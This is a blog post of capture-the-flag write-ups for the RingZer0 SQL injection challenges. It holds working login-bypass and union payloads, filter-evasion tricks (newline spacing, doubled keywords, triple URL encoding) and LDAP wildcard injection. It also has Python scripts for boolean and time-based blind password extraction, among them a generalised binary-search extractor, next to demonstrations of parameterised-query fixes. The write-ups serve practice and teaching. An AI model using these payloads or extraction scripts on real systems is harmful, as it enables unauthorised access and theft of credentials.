Sky's blog

RingZer0 web SQL series writeups

Word count: 2,429 / Reading time: 13 min
2018/02/27

Preface

I recently found a practice site, so I'm starting with its SQL challenges. I'll mark the good ones "good question" so they're easy to revisit later, and so the experts can skip straight past the basic ones.

Most basic SQLi pattern.(point 1)

Warm-up:

username: admin'#
password: 1

The quote closes the string literal and # comments out the rest of the WHERE clause, including the password check. This gives the flag: FLAG-238974289383274893

ACL rulezzz the world.(point 2)

Quick test:

username=admin'

gives

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 4

So the input lands inside a string literal on MySQL. Close it and make the condition true:

username=admin' or 1#

which gives the flag: FLAG-sdfoip340e89rfuj34woit

Login portal 1(point 2)

Filtered:

#
--
=

I didn't test anything further; this gets through directly:

username=admin' or 'a' like 'a&password=1

LIKE stands in for the filtered =, and the unterminated 'a at the end is closed by the application's own closing quote, so no comment sequence is needed. This gives the flag: FLAG-4f885o1dal0q1huj6eaxuatcvn

Random Login Form(point 2)

I tried a second-order injection first, but it didn't look like one, so I tried length truncation instead. Register with

username=admin                                    1
password=1

then log in with

username=admin
password=1

which gives the flag: FLAG-0Kg64o8M9gPQfH45583Mc0jc3u

The mechanism behind the trick (not stated by the challenge itself): the duplicate check compares the padded name against the existing admin row and finds no conflict, but the username column is shorter than the padded value, so the stored name is cut down to admin followed by spaces. MySQL does this silently outside strict mode, and trailing spaces are ignored when strings are compared, so the result is a second admin row whose password we chose.

Just another login form(point 2)(good question)

Tried a few things without result, then tried a union injection:

username = admin' union select md5(1),md5(1),md5(1)#
password = 1

Response: Bad search filter
A search shows this is an LDAP error rather than a SQL one: the backend is building an LDAP search filter, and the parentheses in md5(1) break the filter syntax. So log in with

username = *
password = *

which gives the flag: FLAG-38i65201RR4B5g1oAm05fHO0QP
An unescaped * is a wildcard in an LDAP filter, so a filter like (uid=*) matches every entry. This one is worth studying and I'm noting it down; this kind of injection is rare these days, though I remember it from an earlier XCTF league.
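
Below is an added example, not code from the writeup or from the challenge: it builds the kind of login filter this challenge must be using, evaluates it against a constructed two-entry directory with a minimal matcher that behaves like a server (bare * is a wildcard, bare parentheses are a syntax error, \XX sequences are literal), and shows RFC 4515 escaping closing the hole. The filter shape (&(uid=..)(userPassword=..)), the entries and the response strings are my assumptions; the real portal may bind as the user instead of comparing a password attribute.

```python
import re

# RFC 4515 section 3: characters that must be hex-escaped inside an assertion value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Constructed directory entries standing in for the challenge's real ones.
DIRECTORY = [
    {"uid": "admin", "userPassword": "s3cret"},
    {"uid": "sky", "userPassword": "hunter2"},
]


def escape_filter_value(value: str) -> str:
    """Escape a value so the server matches it literally instead of as a pattern."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter(username: str, password: str, escape: bool = True) -> str:
    """Build the login filter; escape=False reproduces the vulnerable concatenation."""
    if escape:
        username, password = escape_filter_value(username), escape_filter_value(password)
    return f"(&(uid={username})(userPassword={password}))"


def _value_to_regex(pattern: str) -> str:
    """Read an assertion value the way a server does: bare * is a wildcard,
    \\XX is one literal character, and a bare parenthesis is a syntax error."""
    out, i = [], 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 2 < len(pattern):
            out.append(re.escape(chr(int(pattern[i + 1:i + 3], 16))))
            i += 3
        elif ch == "*":
            out.append(".*")
            i += 1
        elif ch in "()":
            raise ValueError("Bad search filter")
        else:
            out.append(re.escape(ch))
            i += 1
    return "".join(out)


def search(filter_str: str, entries=DIRECTORY) -> list:
    """Minimal evaluator for (&(uid=..)(userPassword=..)); returns the matching uids."""
    m = re.fullmatch(r"\(&\(uid=(.*)\)\(userPassword=(.*)\)\)", filter_str, re.DOTALL)
    if m is None:
        raise ValueError("Bad search filter")
    uid_re, pw_re = (re.compile(_value_to_regex(v), re.DOTALL) for v in m.groups())
    return [e["uid"] for e in entries
            if uid_re.fullmatch(e["uid"]) and pw_re.fullmatch(e["userPassword"])]


def login(username: str, password: str, escape: bool = True) -> str:
    """What the portal answers: the first matching uid, 'Invalid login', or the LDAP error text."""
    try:
        hits = search(build_filter(username, password, escape))
    except ValueError as err:
        return str(err)
    return hits[0] if hits else "Invalid login"


if __name__ == "__main__":
    print(login("admin' union select md5(1),md5(1),md5(1)#", "1", escape=False))  # Bad search filter
    print(login("*", "*", escape=False))   # admin: wildcard matches the first entry
    print(login("*", "*"))                 # Invalid login: escaped to \2a, matched literally
```

The union payload from the writeup trips the parenthesis check exactly as the real server did, the unescaped * / * pair logs in as the first entry, and the same pair through escape_filter_value() matches nothing.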

Po po po po postgresql(point 2)

Quick test:

username=admin' or 'a' like 'a&password=1

Response:

ERROR:  invalid input syntax for type boolean: "admin"
LINE 1: SELECT * FROM users WHERE (username = ('admin' or 'a' like '...

The error leaks the query: the value sits inside its own parentheses within a parenthesised comparison, and PostgreSQL, being strict about types, refuses 'admin' as a boolean operand of or. So close both parentheses and comment out the rest:

username=admin') or 'a' like 'a') -- &password=1

which gives the flag: FLAG-mdeq68jNN88xLB1o2m8V33Ld

0 Day Store(point 3)

The challenge is far too laggy, every click takes forever :)
I'll have to put this one aside for now.

Don’t mess with Noemie; she hates admin!(point 3)

Try:

username = admin' or sleep(5) or 'a' like 'a

The sleep fires, so the quote is closed correctly. So go straight for it:

username = admin' or 'a' like 'a

Login fails. So guess the backend statement:

$sql = "select * from users where username='$username' and password = '$password'";

AND binds tighter than OR, so the previous payload became username='admin' or ('a' like 'a' and password='1'), which only helps if the password is right. So try instead

username = 1' or 1 or '
password = 1

which substitutes to

select * from users where username='1' or 1 or '' and password = '1'

The '' and password = '1' part groups together and is false, but the or 1 makes the whole WHERE true, so the first row is returned and the login is bypassed.
Flag: FLAG-Yk3Hfovvb5kALU9hI2545MaY

What’s the definition of NULL(point 3)(good question)

The URL is ?id=MQ==, obviously base64; it decodes to 1, i.e. id=1.
Quick test (the second line is the first one base64-encoded):

id = 1'#
id = MScj

gives

SQLite Database error please try again later.

Then I tested for a long time with no result. Back to the start: I remembered the challenge has a description

Hint WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)

so the backend SQL really is written like this:

WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET[id]) AND display = 1)

Construct

0) OR (ID IS NULL) OR (1=2

which substitutes to

WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)

The payload closes the inner parenthesis early and re-opens one at the end so the statement stays balanced. Because AND binds tighter than OR, the WHERE now reads (id IS NOT NULL AND ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1): the display = 1 check is neutralised and every row with a NULL id is returned, which, going by the title, is where the flag lives. Base64-encode it:

?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=

which gives the flag: FLAG-sQFYzqfxbZhAj04NyCCV8tqA
This one is also quite interesting and worth studying.
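
The following is an added example, not the challenge's code, covering both this challenge and "Don’t mess with Noemie" above: it reproduces the two precedence bugs on an in-memory SQLite database (the real Noemie target is MySQL, but the precedence rule is the same) next to the parameterised queries that close them. The table layouts, the row contents, the NULL-id flag row and the response strings are my reconstruction from the page's hints, not the real schema.

```python
import base64
import sqlite3

NULL_PAYLOAD = "0) OR (ID IS NULL) OR (1=2"
DB_ERROR = "SQLite Database error please try again later."


def encode_id(raw: str) -> str:
    """base64 the way the challenge wraps ?id= (encode_id('1') == 'MQ==')."""
    return base64.b64encode(raw.encode()).decode()


def make_db() -> sqlite3.Connection:
    """Constructed rows: the flag row for the NULL challenge has a NULL id, as the title hints."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('noemie', 'unknown-to-us');
        CREATE TABLE quotes (id INTEGER, quote TEXT, display INTEGER);
        INSERT INTO quotes VALUES (1, 'public quote', 1);
        INSERT INTO quotes VALUES (2, 'unpublished quote', 0);
        INSERT INTO quotes VALUES (NULL, 'FLAG-constructed-not-real', 0);
    """)
    return db


def noemie_login(db, username: str, password: str, safe: bool = False):
    """Login as the writeup reconstructs it; returns the matched username or None.
    Vulnerable form with "1' or 1 or '":  username='1' or 1 or '' AND password='1'
    parses as  username='1' OR 1 OR ('' AND password='1')  and is always true."""
    if safe:
        sql, args = "SELECT username FROM users WHERE username=? AND password=?", (username, password)
    else:
        sql, args = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'", ()
    row = db.execute(sql, args).fetchone()
    return row[0] if row else None


def null_lookup(db, id_b64: str, safe: bool = False) -> list:
    """The hinted WHERE fed with the base64-decoded id; returns the matched quotes.
    Vulnerable form with NULL_PAYLOAD:  ... AND (id = 0) OR (ID IS NULL) OR (1=2 AND display = 1),
    which AND/OR precedence turns into 'every row whose id is NULL', display check bypassed."""
    raw = base64.b64decode(id_b64).decode()
    where = "WHERE (id IS NOT NULL) AND (id = {} AND display = 1)"
    try:
        if safe:
            rows = db.execute("SELECT quote FROM quotes " + where.format("?"), (raw,))
        else:
            rows = db.execute("SELECT quote FROM quotes " + where.format(raw))
        return [r[0] for r in rows]
    except sqlite3.Error:
        return [DB_ERROR]  # what the page showed for id = 1'#


if __name__ == "__main__":
    db = make_db()
    print(noemie_login(db, "admin' or 'a' like 'a", "1"))   # None, as in the writeup
    print(noemie_login(db, "1' or 1 or '", "1"))             # noemie
    print(null_lookup(db, "MScj"))                           # the SQLite error
    print(null_lookup(db, encode_id(NULL_PAYLOAD)))          # the NULL-id row
    print(null_lookup(db, encode_id(NULL_PAYLOAD), safe=True))  # []
```

With a bound parameter the payload is compared as a plain string against an integer column and matches nothing, and the NULL row can never surface because id IS NOT NULL is still evaluated first.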

Login portal 2(point 3)

Went straight in with the old trick:

username = 1' or 1 or '
password = 1

Response:

Wrong password for impossibletoguess.

impossibletoguess looks suspicious: probably a username, and it's echoed back, so try a union

username = 1' union select 1,2#
password = 1

Response:

Wrong password for 1.

The first column of the selected row is echoed, so the rest is standard union injection:

1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
Wrong password for users.
1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users'),2#
Wrong password for username,password.
1' union select (select username from users limit 0,1),2#
Wrong password for impossibletoguess.
1' union select (select password from users limit 0,1),2#
Wrong password for 1b2f190ad705d7c2afcac45447a31b053fada0c4.

A 40-character hex password: clearly not md5, presumably sha1. Rather than crack it, let the union row supply a hash we know:

username = impossibletoguess' union select sha1(1),sha1(1)#
password = 1

The injected row carries sha1(1) in its password column and the submitted password is 1, so the comparison passes. Login succeeds and gives the flag: FLAG-wlez73yxtkae9mpr8aerqay7or

Quote of the day(point 4)

Quick test of the id:

?q=2'
No result found for id "2'"

The value is echoed, so try a union. Spaces are filtered, but a newline (%0a) is whitespace to the SQL parser as well and gets through:

?q=2%0aunion%0aselect%0a1,2#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: 2

Then the usual routine:

?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(TABLE_NAME)%0afrom%0ainformation_schema.TABLES%0awhere%0aTABLE_SCHEMA=database())#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: alkdjf4iu,quotes
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(COLUMN_NAME)%0afrom%0ainformation_schema.COLUMNS%0awhere%0aTABLE_NAME=0x616c6b646a66346975)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: id,flag
?q=2%0aunion%0aselect%0a1,(select%0aflag%0afrom%0aalkdjf4iu%0alimit%0a0,1)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J

(0x616c6b646a66346975 is alkdjf4iu in hex, which saves putting quotes around the table name.)

Done.

Thinking outside the box is the key(point 4)

Quick test:

?id=2'

gives

SQLite Database error please try again later.

So it's SQLite. Keep testing:

?id=2 and 1=2 union select 1,2 from sqlite_master
2
?id=2 and 1=2 union select 1,sqlite_version() from sqlite_master
3.8.7.1
?id=2 and 1=2 union select 1,((select name from sqlite_master where type='table' limit 0,1)) from sqlite_master
random_stuff

The and 1=2 empties the original result so only the union row is displayed; sqlite_master is SQLite's schema catalogue, its equivalent of information_schema. Stepping the limit offset gives all the table names:

random_stuff
ajklshfajks
troll
aatroll

I picked ajklshfajks; from the previous challenges it should have a flag column:

?id=2 and 1=2 union select 1,((select flag from ajklshfajks limit 0,1)) from sqlite_master
FLAG-13lIBUTHNFLEprz2KKMx6yqV

Done.

No more hacking for me!(point 4)

Nasty one: the explanation is in the page source (F12):

<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->

No wonder I couldn't get anywhere :(
Once you see this it's easy. PHP has already URL-decoded the query string once when it fills $_GET, and the filter decodes twice more, with the last urldecode() running after the quote stripping and addslashes(). So a triple-encoded quote, %252527, survives every check and only turns into ' at the final step:

http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 -- 
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527 and tbl_name=%252527random_data%252527 limit 0,1 --

random_data CREATE TABLE random_data (id int, message varchar(50), display int)

http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --

which gives the flag:

FLAG-ev72V7Q4a1DzYRw5fxT71GC815JE

Quote of the day reloaded(point 5)

Feels like this one needs some guesswork, or I'm missing something.
After much trial and error, this works:

?q=3\&s=ununionion select 1,2%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: 2

union has to be doubled: the filter removes the word once, so ununionion is left as union.

?q=3\&s=ununionion%20select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database())%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: qdyk5,quotes
?q=3\&s=ununionion%20select%201,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7164796b35)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: id,flag
?q=3\&s=ununionion%20select%201,(select flag from qdyk5 limit 0,1)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: FLAG-enjlleb337u17K7yLqZ927F3

Done.
(Note: even though I solved it, I'm still puzzled; the pieces don't seem to connect, and I found this by trial and error.)
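
Added example (not the writeup's or the challenges' code) covering the three filters bypassed in "Quote of the day", "No more hacking for me!" and this challenge: each filter is emulated in Python and run against an in-memory SQLite table so the bypass can be checked offline. The space filter and the single-pass union removal are my guesses at what those two challenges do (the page only shows that %0a and ununionion work); the third is the exact PHP chain quoted in the dev comment, re-implemented call by call with the query-string decode PHP performs before $_GET is filled. My reading of the q=3\ trick, which the page does not explain, is that the backslash escapes the closing quote of q so that s is evaluated inside the same string literal; the emulation does not reproduce that part. The random_data table uses the CREATE TABLE the challenge leaked; its rows and the quotes table are constructed.

```python
import html
import sqlite3
from urllib.parse import unquote

# Payloads copied from the writeup (the part after ?id=), for the emulation below.
PAYLOAD_TABLES = "0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 -- "
PAYLOAD_FLAG = "0%252527 union all select 1,message,3 FROM random_data limit 2,1 --"


def make_db() -> sqlite3.Connection:
    """Constructed sample data; random_data uses the leaked CREATE TABLE."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE random_data (id int, message varchar(50), display int);
        INSERT INTO random_data VALUES (1, 'hello', 1), (2, 'world', 1), (3, 'FLAG-constructed-not-real', 0);
        CREATE TABLE quotes (id INTEGER, quote TEXT);
        INSERT INTO quotes VALUES (1, 'quote one'), (2, 'quote two'), (3, 'quote three');
    """)
    return db


def strip_spaces(s: str) -> str:
    """'Quote of the day': my guess at the filter -- plain spaces removed, other whitespace kept."""
    return s.replace(" ", "")


def strip_union_once(s: str) -> str:
    """'Quote of the day reloaded': a single str_replace('union', '', s), the classic double-write victim."""
    return s.replace("union", "")


def addslashes(s: str) -> str:
    """PHP addslashes(): a backslash before ' " \\ and NUL."""
    return "".join("\\0" if c == "\x00" else ("\\" + c if c in "'\"\\" else c) for c in s)


def most_secure_filter(php_get_id: str) -> str:
    """The chain from the dev comment, innermost call first.
    php_get_id is $_GET['id'], i.e. the query-string value PHP has already URL-decoded once."""
    step = html.escape(php_get_id, quote=True)  # htmlspecialchars(.., ENT_QUOTES); Python writes ' as &#x27;, PHP as &#039;
    step = unquote(step)                        # urldecode
    step = step.replace("'", "")                # str_replace("'", "", ..)
    step = addslashes(step)                     # addslashes
    return unquote(step)                        # urldecode: runs last, after every quote check


def filtered_id_from_query_string(raw: str) -> str:
    """What reaches the SQL for ?id=<raw>: PHP's own decode, then the filter."""
    return most_secure_filter(unquote(raw))


def quote_lookup(db, user_q: str, filt) -> list:
    """Quote endpoints: unquoted numeric id, one filter applied; a SQL error shows as 'no result'."""
    try:
        rows = db.execute(f"SELECT id, quote FROM quotes WHERE id = {filt(user_q)}").fetchall()
    except sqlite3.Error:
        return []
    return [str(r[1]) for r in rows]


def random_data_lookup(db, raw_id: str) -> list:
    """'No more hacking': the filtered id goes into a quoted literal, so a surviving ' breaks out."""
    sql = f"SELECT id, message, display FROM random_data WHERE id = '{filtered_id_from_query_string(raw_id)}'"
    try:
        return [str(r[1]) for r in db.execute(sql)]
    except sqlite3.Error:
        return []


if __name__ == "__main__":
    db = make_db()
    print(quote_lookup(db, "2 union select 1,2", strip_spaces))        # [] : spaces stripped, query broken
    print(quote_lookup(db, "2\nunion\nselect\n1,2", strip_spaces))     # quote two and 2
    print(quote_lookup(db, "3 ununionion select 1,2", strip_union_once))  # quote three and 2
    print(filtered_id_from_query_string("0%27"), filtered_id_from_query_string("0%2527"),
          filtered_id_from_query_string("0%252527"))                  # 0&#x27; 0 0'
    print(random_data_lookup(db, PAYLOAD_TABLES), random_data_lookup(db, PAYLOAD_FLAG))
```

A singly encoded quote is neutralised by htmlspecialchars(), a doubly encoded one is decoded in time for str_replace() to strip it, and only the triple encoding reaches the final urldecode() intact, which is why the writeup's URLs carry %252527.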

Hot Single Mom(point 6)

The description,

Get laid or get lazy it's up to you 
Find online hot single Mom

tells you this isn't a serious challenge, and sure enough the site is down (lol).
But it gives the source: GoSecure CTF 2014. A search turns up

https://gist.github.com/h3xstream/3bc4f264cc911e37f0d6

which should be a decent injection challenge, and has the flag: FLAG-wBGc5g147MuVQuC28L9Tw8H8HF

Login portal 3(point 6)

I used blind injection here, but it's the first challenge so far that needed it, so I'm not sure whether I made it harder than necessary.
The script (the commented-out payloads are the earlier enumeration stages, each with the value it returned):

import requests
import string

url = "https://ringzer0team.com/challenges/5"
cookie = {  # session cookies from my logged-in browser
    "PHPSESSID": "27vctgun5jjk5ou82oqv9clog2",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
}
flag = ""
for i in range(1, 1000):
    print("i:", i)
    for j in range(33, 127):
        # for j in "0123456789" + string.ascii_letters + "-_!@#$^&*()={}":
        data = {
            # "username": "1' or (substr((database()),%s,1)='%s') and 'a'='a" % (i, j),  # -> login3
            # "username": "1' or (substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1)='%s') and 'a'='a" % (i, j),  # -> users
            # "username": "1' or (substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7573657273),%s,1)='%s') and 'a'='a" % (i, j),  # -> username,password
            "username": "1' or (ascii(substr((select password from users limit 0,1),%s,1))=%s) and 'a'='a" % (i, j),
            "password": "1",  # -> SQL1nj3ct10nFTW
        }
        r = requests.post(url, data=data, cookies=cookie)
        # a row comes back only when the condition is true, and then the app complains about the password
        if "Invalid username / password" in r.text:
            flag += chr(j)
            print(flag)
            break
    else:
        break  # no character matched: we are past the end of the value

I didn't actually enumerate the column names (lol); knowing the pattern by now I guessed password and got it first try.
The resulting password:

SQL1nj3ct10nFTW

Log in and get the flag: FLAG-vgnvokjmi3fgx0s23iv5x8n2w2

When it’s lite it’s not necessarily easy(point 6)

Quick test:

username = 1' or sleep(5) or 'a'='a
password = 1

which errors with

SQLite Database error please try again later. Impossible to fetch username & password from users table

(SQLite has no sleep() function, hence the error.) That saves some work: the message hands over the table and column names, so blind-inject the password column directly:

import requests
import string

url = "https://ringzer0team.com/challenges/19"
cookie = {  # session cookies from my logged-in browser
    "PHPSESSID": "27vctgun5jjk5ou82oqv9clog2",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
}
flag = ""
for i in range(1, 1000):
    print("i:", i)
    for j in "0123456789" + string.ascii_letters + "-_!@#$^&*()={}":
        data = {
            "username": "1' or (substr((select password from users limit 0,1),%s,1)='%s') and 'a'='a" % (i, j),
            "password": "1",  # -> 4dm1nzP455
        }
        r = requests.post(url, data=data, cookies=cookie)
        # a row comes back only when the guessed character is right
        if "Invalid username / password" in r.text:
            flag += j
            print(flag)
            break
    else:
        break  # no character matched: end of the value

Password:

4dm1nzP455

Log in and get the flag: FLAG-rL4t5LRMwjacD82G9vpAd6Gm

Internet As A Service(point 7)

After a lot of testing, this payload works:

?s=1'<0e0union select 1,2,3#

Then the usual routine:

?s=1'<0e0union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1#
iaas
?s=1'<0e0union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA like 0x69616173 limit 0,1#
iaas
rz_flag
?s=1'<0e0union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME like 0x727a5f666c6167 limit 0,1#
flag
?s=1'<0e0union select 1,2,flag from rz_flag limit 0,1#
FLAG-0f6Ie30uNz4Dy7o872e15lXLS2NKO1uj

(0x69616173 and 0x727a5f666c6167 are iaas and rz_flag in hex.)

Done.

Login portal 4(point 7)

I used a time-based blind injection for this one.
Script:

import requests

url = "https://ringzer0team.com/challenges/6"
cookie = {  # session cookies from my logged-in browser
    "PHPSESSID": "vtqgjp8amva1fsr6eolee70af4",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
    "_gat": "1",
}
flag = ""
for i in range(1, 1000):
    for j in range(33, 127):
        print("i:", i, "j:", j)
        data = {
            # sleep(3) fires only when the guess is right, pushing the request past the 2.5 s timeout
            "username": "1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '" % (i, j),
            "password": "1",
        }
        try:
            r = requests.post(url, data=data, cookies=cookie, timeout=2.5)
        except requests.exceptions.Timeout:
            flag += chr(j)
            print(flag)
            break
    else:
        break  # no character matched: end of the value

Password:

UrASQLi1337!

Log in and get the flag:

FLAG-70ygerntbicjdzrxmm0rmk0xx2
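
The three scripts above try every candidate character for every position, which is ~94 requests per character and loops forever once the value ends. The following is an added example, not the writeup's code, of the same boolean-blind extraction done with a binary search on the character code and a length probe, so each unknown costs about seven requests and the loop stops by itself. It runs against a simulated login (sqlite3 in memory, constructed users row, a secret that is only a stand-in) so it can be checked offline; against a real target you replace the oracle, and for a time-based portal like Login portal 4 the oracle times a sleep() instead of reading the response. Assumptions: the login looks the user up by username first and checks the password afterwards, which is what the "Invalid username / password" oracle in the scripts suggests; SQLite has no ascii(), so unicode() stands in for it.

```python
import sqlite3
from typing import Callable, Tuple

SECRET = "4dm1nzP455"  # constructed stand-in for the value being extracted


def make_login() -> Callable[[str, str], str]:
    """A login with the shape the writeup's responses suggest: look the user up by an
    (injectable) username, then compare the password in code. Constructed data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))

    def login(username: str, password: str) -> str:
        row = db.execute(f"SELECT password FROM users WHERE username = '{username}'").fetchone()
        if row is None:
            return "Unknown user"
        return "Welcome" if row[0] == password else "Invalid username / password"

    return login


def boolean_oracle(login) -> Callable[[str], bool]:
    """Wrap the login into a yes/no oracle for an SQL condition, using the writeup's payload shape.
    For a time-based target, replace the body with a timing check around sleep()."""
    def ask(cond: str) -> bool:
        # username='1' or (cond) and 'a'='a'  ->  a row comes back exactly when cond is true
        return "Invalid username / password" in login(f"1' or ({cond}) and 'a'='a", "1")
    return ask


def extract(ask: Callable[[str], bool], expr: str, max_len: int = 64) -> Tuple[str, int]:
    """Read the value of SQL expression `expr` through the oracle; returns (value, queries used).
    The length and then each character are found by binary search on "value > n" questions.
    unicode() is SQLite's ascii(); use ascii() on MySQL."""
    queries = 0

    def lower_bound(lo: int, hi: int, greater_than: Callable[[int], str]) -> int:
        # smallest n in [lo, hi] for which "value > n" is false, i.e. the value itself
        nonlocal queries
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if ask(greater_than(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = lower_bound(0, max_len, lambda n: f"length(({expr})) > {n}")
    chars = [
        chr(lower_bound(32, 126, lambda n, i=i: f"unicode(substr(({expr}), {i}, 1)) > {n}"))
        for i in range(1, length + 1)
    ]
    return "".join(chars), queries


if __name__ == "__main__":
    ask = boolean_oracle(make_login())
    value, queries = extract(ask, "select password from users limit 0,1")
    print(value, "in", queries, "requests")
```

The character range 32..126 assumes printable ASCII, which held for every password in this series; widen it if the target stores binary or non-ASCII data.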

Size DOES matter(point 7)

Sadly, another one where the site is down.

/etc/passwd(point 7)

Same as above: the challenge is down (it lives on a different port).
Both challenges are about /etc/passwd, so probably load_file().

Groups of hacker(point 7)

The useless search tool(point 8)
